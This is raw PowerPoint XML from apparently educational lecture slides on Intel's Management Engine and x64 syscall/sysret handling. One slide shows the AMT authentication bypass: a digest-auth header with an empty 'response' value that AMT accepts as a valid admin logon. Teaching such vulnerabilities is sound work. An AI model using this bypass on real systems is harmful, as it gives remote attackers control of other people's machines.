              <a:t>   response="7a8df4aa68a83ba59855d7a433522cf7",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>qop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>="auth", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>=00000001,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>cnonce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>="6e8da33dda6b05d8"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A072DC68-C1DF-4EEE-BB78-1A2B0DFCCFC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2944636" y="3802445"/>
            <a:ext cx="2265125" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>response=“”,</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Group 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BF2E595-78FD-4F97-A6A3-A769CA391CAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2528631" y="4003747"/>
            <a:ext cx="1172883" cy="2658279"/>
            <a:chOff x="2528631" y="4003747"/>
            <a:chExt cx="1172883" cy="2658279"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Arrow: Bent-Up 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA0117B6-3B9C-4594-ACA8-59EDB7BDCC53}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="1793078" y="4753591"/>
              <a:ext cx="2643989" cy="1172882"/>
            </a:xfrm>
            <a:prstGeom prst="bentUpArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 20897"/>
                <a:gd name="adj2" fmla="val 2500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257A914-39C2-426C-BE20-AA0387762EB7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2528631" y="4003747"/>
              <a:ext cx="386765" cy="2337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3CD014F-64B2-4750-A9E1-73EEF00280E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3701514" y="6089145"/>
            <a:ext cx="7835056" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI Black" panose="020B0A02040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>AMT will accept the admin logon as valid!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF22A6A2-0A27-4829-8607-8C34F865AD8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2915396" y="3874499"/>
            <a:ext cx="6541688" cy="451166"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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9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xEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="19" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" grpId="2"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6" grpId="0" animBg="1"/>
      <p:bldP spid="6" grpId="1" animBg="1"/>
      <p:bldP spid="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FE1C582-0B4D-4858-B11C-A6DB684307DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="11955933"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="12192000" cy="11955933"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="Picture 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{173767DC-1429-4CAF-B4CC-328F35C5B893}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="12192000" cy="4383838"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Picture 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{511B105A-2033-4104-B36D-9A38A51A358C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="85060" y="4654210"/>
              <a:ext cx="12021879" cy="1788031"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A38C4707-7842-4F68-B589-F643E5244E0A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="6863607"/>
              <a:ext cx="12192000" cy="5092326"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17293141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22222E-6 L 0 -0.66389 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-3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2E04F3-D331-4906-8D6B-D37BFA3F0998}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="6865755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="356114410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27C040-D0D9-40D0-9B69-CCA7F23B4DFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1880535"/>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AF4DA-C176-4E63-95FF-197EC3E09888}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t>Outline</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA810291-F5CC-4D0B-8B33-CEA06941A2B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Intel’s Management Engine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Intel’s Implementation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1"/>
              <a:t>sysret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C25F08CE-9688-45A6-A5F2-E9BC4A47B972}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8196221" y="1287379"/>
            <a:ext cx="4064193" cy="4736264"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F2FE554-AF26-4D46-B414-EBABAC01DE1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21110959">
            <a:off x="8396411" y="1533391"/>
            <a:ext cx="2504079" cy="1154162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="1" dirty="0">
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Remote attacker can take over your machine!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1969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4B23A4-2F33-468A-BA8D-C0147DDB05EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2617470"/>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AF4DA-C176-4E63-95FF-197EC3E09888}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t>Outline</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA810291-F5CC-4D0B-8B33-CEA06941A2B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Intel’s Management Engine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Intel’s Implementation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1"/>
              <a:t>sysret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52EACEA1-707F-41C9-B0B1-49C1DBE434B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8114739" y="2040255"/>
            <a:ext cx="3759935" cy="4817745"/>
            <a:chOff x="8114739" y="2040255"/>
            <a:chExt cx="3759935" cy="4817745"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB7966FB-A02D-46CE-9B18-EF14C14E4883}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8114739" y="2040255"/>
              <a:ext cx="3759935" cy="4817745"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="TextBox 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88B61039-AFB2-41F0-80E3-B78350AAAC1E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9262310" y="2271305"/>
              <a:ext cx="2504079" cy="1200329"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                  <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>User-level code can force the kernel to panic!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1931737614"/>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CC18-09E5-4927-8327-33773799F834}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="-43955"/>
            <a:ext cx="10515600" cy="741785"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AMD’s x64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sysret</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9BA5E7DE-3238-4D16-A77D-E1112DA71951}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="613613"/>
            <a:ext cx="11169316" cy="6376737"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>rcx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> to save the address of the instruction following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Loads OS system call handler </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>%rip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>IA32_LSTAR MSR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Changes the privilege level to Ring 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Does *not* save </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>—if the OS will use a different </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>, then:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>OS must save </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> in system call handler, and restore it before calling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>sysret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>; or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>User-mode code must save </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> before calling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>, and restore it in the instruction immediately following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Arguments to the system call passed in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>rsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>rdx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>rcx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>%r8</a:t>
            </a:r>
